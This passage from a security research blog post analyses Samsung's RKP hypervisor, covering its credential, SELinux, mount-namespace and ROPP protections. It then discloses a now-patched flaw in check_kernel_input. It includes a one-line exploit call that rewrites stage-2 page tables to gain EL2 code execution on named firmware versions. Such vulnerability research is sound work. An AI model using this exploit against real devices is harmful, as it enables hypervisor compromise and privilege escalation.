it checks if the back pointer of the current struct task_security_struct is correct;
it checks if the target RO struct cred is marked as CRED in the physmap;
if the current struct cred doesn't have any flags set;
if any of the current UID/EUID/GID/EGID is 0x61A8xxxx;
- it sets the flag CRED_FLAG_LOD (8).
if the VERIFIED_BOOT_STATE is 0 (device unlocked), it skips the next checks;
otherwise it calls rkp_check_pe and from_zyg_adbd;
- rkp_check_pe (check privilege escalation) checks if the current ID is > AID_SYSTEM and the target ID is <= AID_SYSTEM. It checks the UID, GID, EUID and EGID;
- from_zyg_adbd returns if the current task is flagged, or if it has a parent that is either zygote, zygote64 or adbd (meaning it is a child of these tasks);
if both functions return true, it calls rkp_privilege_escalation to trigger a violation;
otherwise, and also in the case of an unlocked device, it will skip the next checks.
it starts a series of checks on the UID/EUID/GID/EGID:
for each pair (current / target) of IDs, it calls check_privilege_escalation;
- this function returns if the current ID belong to LOD but the target doesn't.
if any of the calls returned true, it calls rkp_privilege_escalation.
now that the checking is finished, it copies to RW struct cred into the RO one;
it sets the use_cnt field of the RO struct cred to the value given as argument;
if the command type is RKP_CMD_COPY_CREDS (e.g. called from copy_creds):
it sets the back pointer of the RO struct cred to the struct task_struct.
otherwise, if the command type is RKP_CMD_CMMIT_CREDS (called from commit_creds) or RKP_CMD_OVRD_CREDS (called from override_creds):
it gets the PGD of the struct mm_struct of the current struct task_struct;
if it is NULL, it gets the PGD from TTBR1_EL1;
it sets the PGD back pointer of the RO struct cred;
it sets the back pointer of the RO struct cred to the current task;
if the command type is RKP_CMD_OVRD_CREDS:
- if the "use counter" is 0 or 1, it unsets the flag CRED_FLAG_ORPHAN (1);
- otherwise, it sets the flag CRED_FLAG_ORPHAN (1).
it calls chk_invalid_sec_ptr on the struct task_security_struct given as argument;
this function checks if its start and address are marked as SEC_PTR in the physmap;
and if it has the expected size (a multiple of SP_BUFF_SIZE).
it checks the security context ID for privilege escalation:
if we're defer inited, the current SID >= SECINITSID_SYSCTL_NET_UNIX and the target SID <= SECINITSID_SYSCTL_KERNEL, then this is privilege escalation;
(the SECINITSID_xxx are defined in security/selinux/include/flask.h).
it copies the target struct task_security_struct into the RO one;
it sets the security field of the RO struct cred to the RO one;
it sets the bp_cred field of the RO struct task_security_struct to the RO one;
if the device is unlocked, it returns early;
otherwise, if the target is not flagged CRED_FLAG_MARK_PPT:
if the parent task of the current task if flagged CRED_FLAG_MARK_PPT:
- if flags the target as CRED_FLAG_CHILD_PPT.

SELinux Initialization

RKP also protects the ss_initialized global variable that is used by the kernel to indicate if SELinux has been initialized (if a policy has been loaded). The kernel calls RKP in security_load_policy to set it to 1. This has likely been added because if it has been used to disable SELinux in a previous RKP bypass.

int security_load_policy(void *data, size_t len)
{
    // ...
        uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
    // ...
}

On the hypervisor side, rkp_cmd_selinux_initialized calls rkp_selinux_initialized.

int64_t rkp_cmd_selinux_initialized(saved_regs_t* regs) {
  rkp_selinux_initialized(regs);
  return 0;
}

void rkp_selinux_initialized(saved_regs_t* regs) {
  // ...

  ss_initialized_va = regs->x2;
  value = regs->x3;
  ss_initialized = rkp_get_pa(ss_initialized_va);
  if (ss_initialized) {
    if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
      rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
    } else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
      if (value == 1) {
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
      } else {
        rkp_policy_violation("RKP_3ba4a93d");
      }
    } else if (ss_initialized == rkp_cred->SELINUX) {
      if (value == 1 || *ss_initialized != 1) {
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
      } else {
        rkp_policy_violation("RKP_cef38ae5");
      }
    } else {
      rkp_policy_violation("RKP_ced87e02");
    }
  } else {
    uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
  }
}

rkp_selinux_initialized does the following:

it checks that ss_initialized is location in the .rodata section;
it only allows it to be set to 1, and triggers a violation otherwise.

Mount Namespaces Protection

Kernel Structures

Similarly to the credentials, the struct vfsmount are allocated in read-only pages. And this structure also gets a new field for storing the back pointer to the struct mount that owns it.

// from include/linux/mount.h
struct vfsmount {
    // ...
    struct mount *bp_mount; /* pointer to mount*/
    // ...
} __randomize_layout;

This value also gets verified on each SELinux hooks via the call to security_integrity_current.

// from fs/namespace.c
extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
    struct mount *root = NULL;
    struct nsproxy *nsp = NULL;
    int ret = 0;

    if((in_interrupt()
         || in_softirq())){
        return 0;
    }
    nsp = current->nsproxy;
    if(!ns_prot || !nsp ||
        !nsp->mnt_ns) {
        return 0;
    }
    root = current->nsproxy->mnt_ns->root;
    if(root != root->mnt->bp_mount){
        printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
        ret = 1;
    }
    return ret;
}

// from security/selinux/hooks.c
int security_integrity_current(void)
{
  // ...
  if ( rkp_cred_enable &&
  // ...
        cmp_ns_integrity())) {
  // ...
  }
  // ...
}

We can see that cmp_ns_integrity checks if the back pointer is valid.

Namespace Initialization

When the kernel allocates a new mount namespace in alloc_vfsmnt of fs/namespace.c, it makes a call RKP to RKP to initialize the back pointer of the struct vfsmount.

// from fs/namespace.c
void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
    uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}

static int mnt_alloc_vfsmount(struct mount *mnt)
{
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
    if(!vfsmnt)
        return 1;

    spin_lock(&mnt_vfsmnt_lock);
    rkp_init_ns(vfsmnt,mnt);
//  vfsmnt->bp_mount = mnt;
    mnt->mnt = vfsmnt;
    spin_unlock(&mnt_vfsmnt_lock);
    return 0;
}

static struct mount *alloc_vfsmnt(const char *name)
{
    // ...
        err = mnt_alloc_vfsmount(mnt);
        if (err)
            goto out_free_cache;
    // ...
}

On the hypervisor side, rkp_cmd_init_ns calls rkp_init_ns.

int64_t rkp_cmd_init_ns(saved_regs_t* regs) {
  rkp_init_ns(regs);
  return 0;
}

int64_t chk_invalid_ns(uint64_t vfsmnt) {
  if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE)
    return 1;
  rkp_phys_map_lock(vfsmnt);
  if (!is_phys_map_ns(vfsmnt)) {
    uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
    rkp_phys_map_unlock(vfsmnt);
    return 1;
  }
  rkp_phys_map_unlock(vfsmnt);
  return 0;
}

void rkp_init_ns(saved_regs_t* regs) {
  // ...

  vfsmnt = rkp_get_pa(regs->x2);
  if (!chk_invalid_ns(vfsmnt)) {
    memset(vfsmnt, 0, rkp_cred->NS_SIZE);
    *(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
  }
}

rkp_init_ns calls chk_invalid_ns to check if the struct vfsmount is marked as NS in the physmap and matches the expected size. If it does, it memsets it and sets the back pointer to the owning struct mount.

Setting Fields

To set fields of the struct vfsmount, once again the kernel calls RKP.

It does with the following kernel and hypervisor functions:

Field	Kernel Function	Hypervisor Function
`mnt_sb`	`rkp_set_mnt_root_sb`	`rkp_cmd_ns_set_root_sb`
`mnt_flags`	`rkp_assign_mnt_flags`	`rkp_cmd_ns_set_flags`
`data`	`rkp_set_data`	`rkp_cmd_ns_set_data`

On the kernel side, the functions are:

// from fs/namespace.c
void rkp_set_mnt_root_sb(struct vfsmount *mnt,  struct dentry *mnt_root,struct super_block *mnt_sb)
{
    uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}
void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
    uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}
void rkp_set_data(struct vfsmount *mnt,void *data)
{
    uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}
void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f |= flags;
    rkp_assign_mnt_flags(mnt,f);
}

void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f &= ~flags;
    rkp_assign_mnt_flags(mnt,f);
}

On the hypervisor side, the functions are:

int64_t rkp_cmd_ns_set_root_sb(saved_regs_t* regs) {
  rkp_ns_set_root_sb(regs);
  return 0;
}

void rkp_ns_set_root_sb(saved_regs_t* regs) {
  // ...

  vfsmnt = rkp_get_pa(regs->x2);
  if (!chk_invalid_ns(vfsmnt)) {
    *vfsmnt = regs->x3;
    *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
  }
}

int64_t rkp_cmd_ns_set_flags(saved_regs_t* regs) {
  rkp_ns_set_flags(regs);
  return 0;
}

void rkp_ns_set_flags(saved_regs_t* regs) {
  // ...

  vfsmnt = rkp_get_pa(regs->x2);
  if (!chk_invalid_ns(vfsmnt))
    *(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
}

int64_t rkp_cmd_ns_set_data(saved_regs_t* regs) {
  rkp_ns_set_data(regs);
  return 0;
}

void rkp_ns_set_data(saved_regs_t* regs) {
  // ...

  vfsmnt = rkp_get_pa(regs->x2);
  if (!chk_invalid_ns(vfsmnt))
    *(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
}

Each of the functions call chk_invalid_ns to check if the structure is valid, before setting its field.

New Mountpoint

The last command is called when a new mount point is being created.

// from fs/namespace.c
#define KDP_MOUNT_ROOTFS "/root" //system-as-root
#define KDP_MOUNT_ROOTFS_LEN strlen(KDP_MOUNT_ROOTFS)

#define KDP_MOUNT_PRODUCT "/product"
#define KDP_MOUNT_PRODUCT_LEN strlen(KDP_MOUNT_PRODUCT)

#define KDP_MOUNT_SYSTEM "/system"
#define KDP_MOUNT_SYSTEM_LEN strlen(KDP_MOUNT_SYSTEM)

#define KDP_MOUNT_VENDOR "/vendor"
#define KDP_MOUNT_VENDOR_LEN strlen(KDP_MOUNT_VENDOR)

#define KDP_MOUNT_ART "/apex/com.android.runtime"
#define KDP_MOUNT_ART_LEN strlen(KDP_MOUNT_ART)

#define KDP_MOUNT_ART2 "/com.android.runtime@1"
#define KDP_MOUNT_ART2_LEN strlen(KDP_MOUNT_ART2)

#define ART_ALLOW 2

enum kdp_sb {
    KDP_SB_ROOTFS = 0,
    KDP_SB_ODM,
    KDP_SB_SYS,
    KDP_SB_VENDOR,
    KDP_SB_ART,
    KDP_SB_MAX
};

int art_count = 0;

static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt)
{
    if (!mount_point || !mnt)
        return;

    if (!odm_sb &&
        !strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
    } else if (!rootfs_sb &&
        !strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!sys_sb &&
        !strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!vendor_sb &&
        !strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
    } else if (!art_sb &&
        !strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
    } else if ((art_count < ART_ALLOW) &&
        !strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
        if (art_count)
            uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
        art_count++;
    }
}

static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
            int mnt_flags, const char *name, void *data)
{
    // ...
    buf = kzalloc(PATH_MAX, GFP_KERNEL);
    if (!buf){
        kfree(buf);
        return -ENOMEM;
    }
    dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);

    if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW))
        rkp_populate_sb(dir_name,mnt);

    kfree(buf);
    // ...
}

do_mount calls do_new_mount which calls rkp_populate_sb. This function checks the path the mount point against specific paths, and then calls RKP.

The predefined paths are:

/root
/product
/system
/vendor
/apex/com.android.runtime
/com.android.runtime@1

On the hypervisor side, rkp_cmd_ns_set_sys_vfsmnt calls rkp_ns_set_sys_vfsmnt.

int64_t rkp_cmd_ns_set_sys_vfsmnt(saved_regs_t* regs) {
  rkp_ns_set_sys_vfsmnt(regs);
  return 0;
}

void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
  // ...

  if (!rkp_cred) {
    uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
    return;
  }
  art_sb = rkp_get_pa(regs->x2);
  vfsmnt = rkp_get_pa(regs->x3);
  mount_point = regs->x4;
  if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
    uh_log('L', "rkp_kdp.c", 945, "Invalid  source vfsmnt  %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
    return;
  }
  if (!art_sb) {
    uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
    return;
  }
  mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
  *art_sb = mnt_sb;
  switch (mount_point) {
    case KDP_SB_ROOTFS:
      *rkp_cred->SB_ROOTFS = mnt_sb;
      break;
    case KDP_SB_ODM:
      *rkp_cred->SB_ODM = mnt_sb;
      break;
    case KDP_SB_SYS:
      *rkp_cred->SB_SYS = mnt_sb;
      break;
    case KDP_SB_VENDOR:
      *rkp_cred->SB_VENDOR = mnt_sb;
      break;
    case KDP_SB_ART:
      *rkp_cred->SB_ART = mnt_sb;
      break;
  }
}

rkp_ns_set_sys_vfsmnt does the following:

it does some sanity checking on the arguments;
it calls chk_invalid_ns to check if the struct vfsmount is valid;
it sets a global variable of the kernel to the value of the mnt_sb field of the struct vfsmount:
either odm_sb, rootfs_sb, sys_sb, vendor_sb or art_sb.
it also sets a field of the rkp_cred hypervisor structure to the same value;
either SB_ROOTFS, SB_ODM, SB_SYS, SB_VENDOR or SB_ART.

Executable Loading

One last check enabled by the mount namespace protection is done in flush_old_exec of fs/exec.c. This function is called (amongst others) by load_elf_binary, so this is likely to prevent the abuse of call_usermodehelper as it has previously been used in a previous Samsung RKP bypass.

// from fs/exec.c
static int kdp_check_sb_mismatch(struct super_block *sb)
{
    if(is_recovery || __check_verifiedboot) {
        return 0;
    }
    if((sb != rootfs_sb) && (sb != sys_sb)
        && (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
        return 1;
    }
    return 0;
}

static int invalid_drive(struct linux_binprm * bprm)
{
    struct super_block *sb =  NULL;
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = bprm->file->f_path.mnt;
    if(!vfsmnt ||
        !rkp_ro_page((unsigned long)vfsmnt)) {
        printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
        return 1;
    }
    sb = vfsmnt->mnt_sb;

    if(kdp_check_sb_mismatch(sb)) {
        printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
                    bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
        return 1;
    }

    return 0;
}
#define RKP_CRED_SYS_ID 1000

static int is_rkp_priv_task(void)
{
    struct cred *cred = (struct cred *)current_cred();

    if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
        cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
        return 1;
    }
    return 0;
}

int flush_old_exec(struct linux_binprm * bprm)
{
    // ...
    if(rkp_cred_enable &&
        is_rkp_priv_task() &&
        invalid_drive(bprm)) {
        panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
    }
    // ...
}

flush_old_exec calls is_rkp_priv_task to check if the task requesting execution of a binary is privileged (ID < 1000). If it is, it calls invalid_drive the check the mount point from which is started the binary.

invalid_drive checks if the mount point structure is protected by RKP (must be read-only). Then if the device is not running in recovery and is not unlocked, if checks if it is in the list of predefined paths.

JOPP/ROPP Commands

If you remember the first section, ROPP is only enabled for high-end Snapdragon devices. So for this subsection we will be looking at the kernel source code and RKP binary for a Snapdragon device.

rkp_cmd_jopp_init and rkp_cmd_ropp_init are probably called by S-Boot/the bootloader.

int64_t rkp_cmd_jopp_init() {
  uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
  return 0;
}

int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
  // ...

  something = virt_to_phys_el1(regs->x2);
  if (*something == 0x4A4C4955) {
    memcpy(0xB0240020, something, 80);
    if (MEMORY[0x80001000] == 0xCDEFCDEF)
      memcpy(0x80001020, something, 80);
    uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
  } else {
    uh_log('W', "rkp.c", 515, "RKP_e08bc280");
  }
  return 0;
}

rkp_cmd_jopp_init is does nothing. rkp_cmd_ropp_init check if the structure it was given as argument starts with the magic value it expects (0x4A4C4955). If it does, it copies it to 0xB0240020. If the memory at 0x80001000 matches another magic value (0xCDEFCDEF), it copies the structure content to 0x80001020 too.

rkp_cmd_ropp_save is probably called by S-Boot/the bootloader, while rkp_cmd_ropp_reload is called by the kernel in __secondary_switched of arch/arm64/kernel/head.S (booting a secondary core).

// from arch/arm64/include/asm/rkp_cfp.h
/*
 * secondary core will start a forked thread, so rrk is already enc'ed
 * so only need to reload the master key and thread key
 */
    .macro ropp_secondary_init ti
    reset_sysreg
    //load master key from rkp
    ropp_load_mk
    //load thread key
    ropp_load_key \ti
    .endm

    .macro ropp_load_mk
#ifdef CONFIG_UH
    push    x0, x1
    push    x2, x3
    push    x4, x5
    mov x1, #0x10 //RKP_ROPP_RELOAD
    mov x0, #0xc002 //UH_APP_RKP
    movk    x0, #0xc300, lsl #16
    smc #0x0
    pop x4, x5
    pop x2, x3
    pop x0, x1
#else
    push    x0, x1
    ldr x0, = ropp_master_key
    ldr x0, [x0]
    msr RRMK, x0
    pop x0, x1
#endif
    .endm

// from arch/arm64/kernel/head.S
__secondary_switched:
    // ...
    ropp_secondary_init x2
  // ...
ENDPROC(__secondary_switched)

int64_t rkp_cmd_ropp_save() {
  return 0;
}

int64_t rkp_cmd_ropp_reload() {
  set_dbgbvr5_el1(MEMORY[0xB0240028]);
  return 0;
}

rkp_cmd_ropp_save does nothing and rkp_cmd_ropp_reload simply sets the DBGBVR5_EL1 (the system register that holds the RRMK - the "master key") to the value at 0xB0240028.

Vulnerability

In the section, we are going to reveal a now-fixed vulnerability that allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices.

Here is some information about the binaries that we are looking at:

Exynos device - Samsung A51 (SM-A515F)
Firmware version: A515FXXU3BTF4
Hypervisor version: Feb 27 2020
Snapdragon device - Samsung Galaxy S10 (SM-G973U)
Firmware version: G973USQU4ETH7
Hypervisor version: Feb 25 2020

Description

There are 2 important functions that you might notice we haven't detailed yet: uh_log and rkp_get_pa.

int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
  // ...

  // ...
  if (level == 'D')
    uh_panic();
  return res;
}

uh_log does some fairly standard string formatting and printing, but it also does more than that. If the log level that was given as the first argument is 'D', then it also calls uh_panic. This will become important in a moment.

Now let's look at rkp_get_pa (called in of a lot of command handlers to verify kernel input):

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...

  if (!vaddr)
    return 0;
  if (vaddr < 0xFFFFFFC000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0)
        paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
      else
        paddr = vaddr - KIMAGE_VOFFSET;
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
  }
  check_kernel_input(paddr);
  return paddr;
}

If the address is not in the fixmap region, it will call virt_to_phys_el1. It the translation doesn't succeed, it calculates it from the KIMAGE_VOFFSET. Otherwise, if the address is in the fixmap region, it calculates it from the PHYS_OFFSET. Finally, it calls check_kernel_input that will check if this address can be used.

int64_t virt_to_phys_el1(int64_t vaddr) {
  // ...

  if (vaddr) {
    at_s12e1r(vaddr);
    par_el1 = get_par_el1();
    if ((par_el1 & 1) != 0) {
      at_s12e1w(vaddr);
      par_el1 = get_par_el1();
    }
    if ((par_el1 & 1) != 0) {
      if ((get_sctlr_el1() & 1) != 0) {
        uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
        if (!has_printed_stack_contents) {
          has_printed_stack_contents = 1;
          print_stack_contents();
        }
        has_printed_stack_contents = 0;
      }
      vaddr = 0;
    } else {
      vaddr = par_el1 & 0xFFFFFFFFF000 | vaddr & 0xFFF;
    }
  }
  return vaddr;
}

virt_to_phys_el1 uses the AT S12E1R (stage 1 & 2 at EL1 read access) and AT S12E1W (stage 1 & 2 at EL1 write access) to get the physical address. If it fails and the MMU is enabled, it will print the stack contents.

int64_t check_kernel_input(uint64_t paddr) {
  // ...

  res = memlist_contains_addr(&protected_ranges, paddr);
  if (res)
    res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  return res;
}

check_kernel_input checks if the physical address in contained in the protected_ranges memlist which, if you recall the previous sections, contains:

0x87000000-0x87200000 (uH region) added in pa_restrict_init
all bitmaps of physmap added in init_cmd_initialize_dynamic_heap

So it checks if we're trying to give an address in uH memory. But if the check fails, it calls uh_log with 'L' as the first argument. uh_log will return and execution will continue like nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.

Exploitation

Exploiting this vulnerability is as simple as calling one of the command handlers with the right arguments. For example, we can use the command #5 (named RKP_CMD_WRITE_PGT3), which calls the rkp_l3pgt_write function that we have seen earlier. Now it is only a matter a finding what to write and where.

In our one-liner exploit, we are targeting the stage 2 page tables and adding a Level 2 block descriptor spanning over the hypervisor memory. By setting the S2AP bit to 0b11, the memory region is now writable, and because the WXN bit set in s1_enable only applies to the AT at EL2, we can freely modify the hypervisor code.

Here is the exploit in its full glory:

uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);

Patch

We noticed that binaries built after May 27 2020 include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. It affected devices with Exynos and Snapdragon chipsets.

Let's take a look at latest firmware update available for our research device to see what the changes are.

int64_t check_kernel_input(uint64_t paddr) {
  // ...

  res = memlist_contains_addr(&protected_ranges, paddr);
  if (res) {
    uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
    uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

Interesting, instead of simply changing the log level, they duplicated the call uh_log. Weird, but at least it does the job. We also noticed that they added some extra checks in rkp_get_pa (better be safe than sorry!):

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...

  if (!vaddr)
    return 0;
  if (vaddr < 0xFFFFFFC000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0)
        paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
      else
        paddr = vaddr - KIMAGE_VOFFSET;
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
  }
  check_kernel_input(paddr);
  if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
    uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
    uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
  }
  return paddr;
}

Conclusion

Let's recap the various protections offered by Samsung RKP:

the page tables cannot be modified directly by the kernel;
- accesses to virtual memory system registers at EL1 are trapped;
- page tables are set as read-only in the stage 2 address translation;
  - except for level 3 tables, but it that case the PXNTable bit is set;
double mappings are prevented, but the checking is only done by the kernel;
- still can't make the kernel text read-write or a new region executable;
sensitive kernel global variables are moved in the .rodata region (read-only);
sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator;
- a various operations, the credentials of a running task are checked:
  - a task that is was not system cannot suddently become system or root;
  - it is possible to set the cred field of a task_struct
  - but the next operation, like executing a shell, will trigger a violation;
- credentials are also reference-counted to prevent their reuse by another task;
it is not possible to execute a binary as root from outside of specific mount points;
on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

With this deep dive into RKP, we have seen that a security hypervisor can help against kernel exploitation, like other defense in depth mechanisms, by making the task harder for an attacker having gained read-write in the kernel. But this great engineering work doesn't prevent making mistakes in the implementation.

There are a lot more things about RKP that we did not mention here but that would deserve a follow up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining in more detail the differences between Exynos and Snapdragon implementations, digging into the new framework and features of the S20, etc.

A Samsung RKP Compendium

Post by Alexandre Adamski

Table Of Contents

Introduction

Kernel Exploitation

JOPP

ROPP

KDP

Getting Started

Hypervisor Crash Course

Our Research Platform

Extracting The Binary

Exynos Devices

Snapdragon Devices

Symbols/Log Strings

Hypervisor Framework

Utility Structures

Memlists

Sparsemaps

Critical Sections

System Initialization

App Initialization

APP_INIT

APP_RKP

Exception Handling

Digging Into RKP

Startup

RKP Start

RKP Deferred Start

RKP Bitmaps

Page Tables Processing

First Level

Second Level

Third Level

Let's Recap

Memlist dynamic_regions

Memlist protected_ranges

Memlist page_allocator.list

Memlist executable_regions

Memlist dynamic_load_regions

Sparsemap physmap (based on dynamic_regions)

Sparsemap ro_bitmap (based on dynamic_regions)

Sparsemap dbl_bitmap (based on dynamic_regions)

Sparsemap robuf/page_allocator.map (based on dynamic_regions)

Page tables of EL2 stage 1

Page tables of EL1 stage 2

RKP/KDP Commands

Protecting Kernel Data

Global Variables

Dynamic Allocations

Modifying Page Tables

First Level

Second Level

Third Level

Allocating/Freeing PGDs

Credentials Protection

Kernel Structures

Protection Initialization

PGD Assignment

Security Change

Process Marking

Credentials Assignment

SELinux Initialization

Mount Namespaces Protection

Kernel Structures

Namespace Initialization

Setting Fields

New Mountpoint

Executable Loading

JOPP/ROPP Commands

Vulnerability

Description

Exploitation

Patch

Conclusion

References

`APP_INIT`

`APP_RKP`

Memlist `dynamic_regions`

Memlist `protected_ranges`

Memlist `page_allocator.list`

Memlist `executable_regions`

Memlist `dynamic_load_regions`

Sparsemap `physmap` (based on `dynamic_regions`)

Sparsemap `ro_bitmap` (based on `dynamic_regions`)

Sparsemap `dbl_bitmap` (based on `dynamic_regions`)

Sparsemap `robuf`/`page_allocator.map` (based on `dynamic_regions`)